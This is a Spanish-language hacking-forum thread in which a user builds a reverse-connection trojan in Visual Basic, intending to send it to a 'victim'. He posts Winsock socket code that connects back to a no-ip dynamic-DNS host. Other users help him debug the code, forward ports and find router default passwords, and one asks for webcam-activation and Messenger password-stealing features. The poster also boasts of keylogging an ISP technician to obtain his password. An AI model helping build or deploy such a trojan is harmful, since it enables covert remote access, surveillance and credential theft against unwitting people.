Foro de elhacker.net

Saludos

regreso a este foro despues de ojearlo hace ya bastante tiempo para ver si alguien me puede ayudar con un problema,
estoy creando un troyano en VB de conexion inversa y pues tecnicamente ya termine, pero las pruebas las estaba realizando en el mismo PC, es decir el winsock se conectaba a la IP local,
entonces luego cambie por un dominio en noip.com, dado que mi IP es dinamica y ya tenia intenciones de enviarlo a la victima, pero antes de enviarlo, decidi probar en la misma PC ( no se si es por eso..)  y pues puse el programa a la escucha y ejecute el otro que se deberia conectar pero no paso nada...
entonces para mirar que pasaba puse un Msgbox que me indicaba el estado de conexion y me arrojo 4, mire y dice que es Resolviendo Host, y pues la verdad no se que significa XD, ni tampoco como arreglarlo jeje,
agradezco mucho a el que me pueda colaborar, es mi primer troyano usando el CSocketMaster , y creo que me estaba quedando bien jejeje
Gracias de antemano

Vamos, nadie me ayuda XD   :silbar:

jeje

buenas, lo que te recomiendo para ayudarte con mas precicion es que dejes tu codigo de como hiciste la conexion, y fijate de que el CScoketMaster lo hayas bajado de la pagina oficial

saludos

en ese caso pongo el fracmento de codigo que se supone coloca a la escucha el Cliente

Private Sub Command1_Click()
ws2.CloseSck
ws2.Protocol = sckTCPProtocol
ws2.LocalPort = 5548

ws2.Listen
End Sub

y el otro esta en un timer

Private Sub Timer1_Timer()

If Not WS.State = 7 Then
WS.CloseSck
WS.RemotePort = 5548
WS.RemoteHost = "sircam66.no-ip.biz"
WS.Connect

Else
Timer1.Enabled = False
End If
End Sub

y creo que ese seria el pedacito que importa, de todas formas, puedes pasarme la pagina oficial del CSocketMAster
Gracias

el code está bien lo que está fallando es el no-ip.. te doy una sugerencia...

porque no le decis a algún voluntario XD(amigo tuyo o algo) y vas probando cada vez que estes en duda,  ahora hace esto:

en vez de poner tu no-ip pone tu ip dinámica común (no vayas a probar con "127.0.0.1"  :P) jaja
y despues pusiste el :

Option Explicit
Public WithEvents ws2 As CSocketMaster

y despues en el form_load:

Set ws2 = New CSocketMaster

y pone un label en el cliente o lo que quieras que sea

if ws2.state = sckConnected then
label.caption = "conectado"
else
label.caption = "desconectado"

un saludo

Saludos

bueno probe lo que me dijiste y no funciono no se porque  :huh:
le cambie el dominio de no-ip por mi ip se lo envie a mi amigo y le deje el msgbox que muestra el estado de la conexión, entoces coloce a escuchar el programa en mi pc y le dije a mi compañero que lo ejecutara y bueno le salieron los mensajes de el estado y siempre era 6, osea conectando, y no se conectaba
igual cada vez que el le daba aceptar a el Msgbox se supone que se debia interntar conectar pero no sirvio, la verdad no tengo idea.........
la otra duda que me surgio ahora es que el winsock tiene otro protocolo que es UDP y quisiera saber si con este protocolo se podria hacer un troyano, la verdad se muy poco acerca de este pero, me nace la duda
Gracias

Este es un ejemplo con CSocketPlus es igual que el CSocketMaster solo que:

CSocketPlu= Usa Arrays
CSocketMaster= No usa Array

PERO SUS EVENTOS SON LOS MISMOS Tomando en cuenta la diferencia de INDEX

A lo que voy es que pruebes con poner el ConnectionRequestID:

Para CSocketMaster:
Revisa este por que no cuento con los archivos del CSocketMaster asi que deduci lo siguiente...¡!

Dim WithEvents ws0 As CSocketPMater
'En un procesoX
Set ws0 = New CSocketMaster
'ws0.CloseSck 'Cuando agregas uno ya esta cerrado por logica
ws0.LocalPort = 453
ws0.Listen
'Fin de Proceso X
 
Private Sub ws0_ConnectionRequest(ByVal requestID As Long)
    ws0.CloseSck
    ws0.Accept requestID
End Sub
 
Private Sub ws0_DataArrival(ByVal bytesTotal As Long)
    Dim datos As String
    ws0.GetData datos, vbString
    Text1 = Text1 & vbCrLf & datos
End Sub
 

Para CSocketPlus

Dim WithEvents ws0 As CSocketPlus
'En un procesoX
Set ws0 = New CSocketPlus
ws0.ArrayAdd 0
'ws0.CloseSck 0 'Cuando agregas uno ya esta cerrado por logica
ws0.LocalPort(0) = 453
ws0.Listen 0
'Fin de Proceso X
 
Private Sub ws0_ConnectionRequest(ByVal Index As Variant, ByVal requestID As Long)
    ws0.CloseSck Index
    ws0.Accept Index, requestID
End Sub
 
Private Sub ws0_DataArrival(ByVal Index As Variant, ByVal bytesTotal As Long)
    Dim datos As String
    ws0.GetData Index, datos, vbString
    Text1 = Text1 & vbCrLf & datos
End Sub
 

Como viste la unica diferencia es que en uno siempre se maneja una variable index (CSocketPluys) y en otro no (CSocketMaster).


Para ver si esta conectado o no sin usar timer en donde usas el Sock con el evento Connect es decir el cliente no el servidor (en el source donde espesificas el ip a conectar). puedes meter estos eventos

CSocketMaster:

Private Sub ws0_Connect()
    MsgBox "Socket Conectado"
End Sub
Private Sub ws0_CloseSck()
    MsgBox "Socket Desconectado"
End Sub
Private Sub ws0_Error( ByVal Number As Integer, Description As String, ByVal sCode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
    MsgBox "Sock Error"
End Sub
 

CSocketPlus

Private Sub ws0_Connect(ByVal Index As Variant)
    MsgBox "Socket Conectado"
End Sub
Private Sub ws0_CloseSck(ByVal Index As Variant)
    MsgBox "Socket Desconectado"
End Sub
Private Sub ws0_Error(ByVal Index As Variant, ByVal Number As Integer, Description As String, ByVal sCode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
    MsgBox "Sock Error"
End Sub
 

P.D.: Con respecto a la DNS sea cual sea (No-ip,dyndns o como sea "X")  deberias rectificar los puetos que deberias abrir para tal acción, tanto en firewall de windows como de av como los de router si llegases a usar (Esto va en su foro correspondiente).

Dulces Lunas¡!

Gracias, igual ahora me voy de viaje espero llegar con nuevas energias para terminar ese troyano, talves tenga que volver a el papel y diseñhazlo de nuevo con el CSocketPlus

Gracias

que ganas ░▒▓BlackZeroҖ▓▒░...reconozoco tu ganas de ayudar...pero habiendo tantos ejemplos basicos de estos "programas" de troyanos suelto en internet...ya no es ayudar sino dar en bandeja...que se "maten" buscando en internet vos no te preocupes...ya todos estos temas que preguntan como hacer un troyano ya todos los foreros debemos saber que tienen que buscar en internet otra no hay...pero ni le des mas codigo que lo busquen como nosotros tuvimos que buscarlo algun dia...porque sino van a venir a preguntar cualuquier "duda" y nosotros los "bulu del foro" le vamos a contestar...esto no va para este tema ..sino para todos los temas que haya asi igual en el foro...ya lo dije alguna vez..pero ni caso hacen...

saludos.

HOla sabes yo tambien me estoy programando un troyano si me pudieras ayudar con algunas funciones como prenderle la webcam.. sacar el password local del messenger
algo

By:Marley87

Ya hay mucho codigo publicado sobre password del msn y más sobre troyanos.

Es tan dificil usarlo? (http://foro.elhacker.net/Themes/converted/images/spanish/search.gif)

jeje, no creo que sea servir en bandeja de plata como dices, pues detodos modos para eso se supone que esta el foro, imagina que viniera alguien a preguntar y la respuesta fuera simplemente, "matate buscando en internet"

Gracias

Yo creo que tu problema es que te encuentras detrás de un router y no has redireccionado el tráfico que entra por tu ip a tu ip local. Entra en la configuración de tu Router y busca "Port Forwarding" o NAT o algo así y redirecciona el tráfico del puerto de tu troyano a tu IP local, seguramente sea ese el problema y no de programación.

Saludos!

pero te funciono sircam666??? porque no dijiste todavía si el troyano conecta

un saludo

Saludos

la verdad no me a querido conectar de ningun modo, para probar cree un sencillo porgrama de chat como los que usan para ejemplificar el uso de winsock, y se lo envie a un amigo y coloque a la escucha y le dije que se conetara a el puerto que puse a escuchar y a mi ip directamente ni siquiera a el dominio de no-ip y pues no sirvio  :-\
estoy a punto de arrojar el pc por la ventana
dejo el codigo para ver que ise mal o que rayos pasa

se supone que este deberia conectarse a este que esta escuchando


Gracias por su ayuda

Gracias por ignorarme, pero cada vez tengo más claro que tu error es que no has mapeado el puerto que pones a la escucha y no de programación... -.-

"No hay peor ciego que el que no quiere ver..."

Gracias por responder jeje no me fije antes,
pero ahora tengo un problema no puedo entrar a la configuracion de mi router, en mi ISP no me dieron la clave y pues hay... no tengo idea
bueno si alguien sabe como le ago para entrar mi router es un Echolife Hg520s

Gracias

el acceso al router debe estar en el manual del router...con buscar en internet en 10 segundos encontras como acceder a la configuracion de cualquier router...

Probaste resetearlo y poner el pass original, según por ahi dicen que es:

entra con explorer a la dir 10.0.0.2/admin.html

Administrador = admin
Clave = tomenague (a mi me funco)

despues aparece la "advanced configuration" y ahi hay mil opciones

eso lo encontre en google despues de buscar 10 segundo como dice neo...

tomalo como quieras  :huh:

adios

claro, pero eso es para tu router que si no me equivoco por el usuario y contraseña el tuyo es un pirelli  :P.

casi siempre debes ir a NAT o en virtual server depende el router...pero busca en internet la marca y ahi dice el usuario y contraseña y la ip del router que debes poner para acceder a la configuracion...

saludos.

seba123neo , busque para su router  ::) jaja, el nombre del router  y como entrar a la configuracion en google y apareció eso, con el mismo nombre de router y modelo

saludos

Saludos

pues en google encontre las claves por defecto pero mi isp la cambio, y cuando resetee el modem desconfigure la red inalambria y tuve que llamar el tecnico,
y cuadno vino le tenia preparado un keylogger y le saque la clave jeje

bueno ahora con la clave voy a ver que ago y luego les cuento

Debes exigir que te proporcionen dichos datos, o de lo contrario para que demonios te dan un servicio si te limitan y lo peor aun LES PAGAS.¡!

P.D.: Ale A Cortar Cabezas

jeje
pues eso hice, llame a el ISp pero no me quicieron suministrar los datos disque por razones de seguridad, en fin ahora estoy mirando lo de redireccionar el trafico y dandole unos retoques a mi troyano
Gracias

Mientras no ingreses al router no podras redireccionar los puertos por defecto y eso hara imposible que corra algun troyano me explico por ejemplo el router por defecto trae 192.168.1.1 lo que tienes que hacer es abrir puertos que usa tu troyano y redireccionar a tu pc que por defecto suponiendo sea una sola maquina sera 192.168.1.2 y abres los puertos Nat ejem el 5240 luego sacas una cuenta No-ip te logueas y activas el DUC todo esta explicado en la sección Analisis y diseño del Malware.
Saludos

Gracias a todos
por fin logre conectarlo ahora voy a mejorar unas cosas y estara listo mitroyano